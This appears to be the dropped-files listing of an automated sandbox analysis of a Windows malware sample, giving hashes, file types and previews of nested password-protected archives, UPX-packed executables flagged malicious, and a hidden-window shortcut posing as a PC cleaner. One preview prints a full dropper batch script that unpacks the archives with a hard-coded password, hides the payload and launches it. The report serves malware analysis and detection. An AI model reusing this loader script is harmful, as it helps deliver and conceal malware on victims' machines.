                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1799902
                                                                                                                                                                                                                              Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                                                              MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                              SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                              SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                              SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1800056
                                                                                                                                                                                                                              Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                                                              MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                              SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                              SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                              SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1800210
                                                                                                                                                                                                                              Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                                                              MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                              SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                              SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                              SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1800364
                                                                                                                                                                                                                              Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                                              MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                              SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                              SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                              SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3473559
                                                                                                                                                                                                                              Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                                              MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                              SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                              SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                              SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                              Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                              MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                              SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                              SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                              SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat Dec 21 01:16:04 2024, mtime=Sat Dec 21 01:16:04 2024, atime=Sat Dec 21 01:16:04 2024, length=1502720, window=hide
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2170
                                                                                                                                                                                                                              Entropy (8bit):3.8211005141915892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:80Iq3RjCmP15yDvN1WmG9WmhZ5yfqWmyyF:809BjCcyLNQaKytLy
                                                                                                                                                                                                                              MD5:8D188C9F854BBC859094744B12CE80AF
                                                                                                                                                                                                                              SHA1:DDDA7F70CCB428B2F622E85F3107986460B49B84
                                                                                                                                                                                                                              SHA-256:1158A29710C38247558A3D8A55A0D3F12F43DA67FB875795A8E7BD0B7E63736F
                                                                                                                                                                                                                              SHA-512:D39CB2A27FA9E24E42E9227E26169730E5096D158E0AA8C3AF433596D6EC38188B92A0026457255D0ABB9559244BCA22F6B11E91D439899259FB99E096F706E0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:L..................F.@.. ......INS..c..INS..c..INS..........................4.:..DG..Yr?.D..U..k0.&...&......vk.v....h...MS...k.INS......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b.....................j...L.o.c.a.l.....N.1......Y....Temp..:......CW.^.Y......l.......................~.T.e.m.p.....p.1......Y....1V1W92~1..X......Y...Y......h.....................4...1.v.1.w.9.2.N.e.C.w.3.S.K.G.K.e.d.e.t.....h.2......Y.. .Y-CLEA~1.EXE..L......Y...Y......m.........................Y.-.C.l.e.a.n.e.r...e.x.e.......r...............-.......q............b.......C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.7.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.1.v.1.w.9.2.N.e.C.w.3.S.K.G.K.e.d.e.t.\.Y.-.C.l.e.a.n.e.r...e.x.e.C.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.1.v.1.w.9.2.N.e.C.w.3.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2989568
                                                                                                                                                                                                                              Entropy (8bit):6.518795012161611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
                                                                                                                                                                                                                              MD5:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              SHA1:4424871CDFD4F9B4FB1039049A75844401A7C358
                                                                                                                                                                                                                              SHA-256:F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E
                                                                                                                                                                                                                              SHA-512:F38B986C639EB2C676E0ECD9316CEA437934550D772F5494E2589626E826A5D23954398C3E4EB4584594E5E6CBEA28FFE195BEA27D2674F1A8119CA14EE869A0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......Q....@.................................W...k.............................1..............................-1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyzzfcwd..*.......*.................@...cnrltnzy.....@1......x-.............@....taggant.0...P1.."...|-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                              Entropy (8bit):3.3738840009832742
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:awVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0l3t0:awRf2RKQ1CGAFAjzvYRQV3t0
                                                                                                                                                                                                                              MD5:ACA7EEC19B427F7599215E799A977328
                                                                                                                                                                                                                              SHA1:A1D98DC1AD3F21DD4414BD08187073E96B18374A
                                                                                                                                                                                                                              SHA-256:AAB4FB08E279F6F12599500058CDA9511455AC863A6590E445DF10C14A22F4FA
